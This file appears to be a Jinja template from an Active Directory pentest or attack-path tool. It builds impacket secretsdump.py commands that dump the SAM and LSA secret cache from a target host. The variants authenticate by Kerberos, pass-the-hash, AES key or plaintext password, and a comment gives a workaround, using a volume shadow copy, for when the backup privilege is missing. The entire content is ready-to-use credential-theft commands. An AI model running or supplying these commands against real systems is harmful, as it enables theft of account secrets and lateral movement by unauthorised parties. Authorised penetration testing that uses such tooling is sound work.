# Dump the SAM and LSA cache on {{target.name}} to get the plain_password_hex
# Troubleshooting:
# RRP SessionError: code: 0x522 - ERROR_PRIVILEGE_NOT_HELD - A required privilege is not held by the client.
# It means that you don't have the privilege SeBackup and you will not be able to perform
# the secretsdump (it can occurs with GPOs). Instead you can create a volume shadow copy
# and retrieve SAM, SECURITY and SYSTEM.
{% if parent.krb_auth %}
secretsdump.py '{{target_no_dollar}}' -k -no-pass -dc-ip {{dc_ip}} -target-ip {{target_ip|red}}
{%- elif parent.secret_type == T_SECRET_NTHASH %}
secretsdump.py '{{fqdn}}/{{parent.obj.name}}@{{target_no_dollar}}' -hashes :{{parent.secret|red}} -dc-ip {{dc_ip}} -target-ip {{target_ip|red}}
{%- elif parent.secret_type == T_SECRET_AESKEY %}
secretsdump.py '{{fqdn}}/{{parent.obj.name}}@{{target_no_dollar}}' -k -no-pass -aesKey {{parent.secret|red}} -dc-ip {{dc_ip}} -target-ip {{target_ip|red}}
{%- elif parent.secret_type == T_SECRET_PASSWORD %}
secretsdump.py '{{fqdn}}/{{parent.obj.name}}:{{parent.secret|red}}@{{target_no_dollar}}' -dc-ip {{dc_ip}} -target-ip {{target_ip|red}}
{%- endif %}
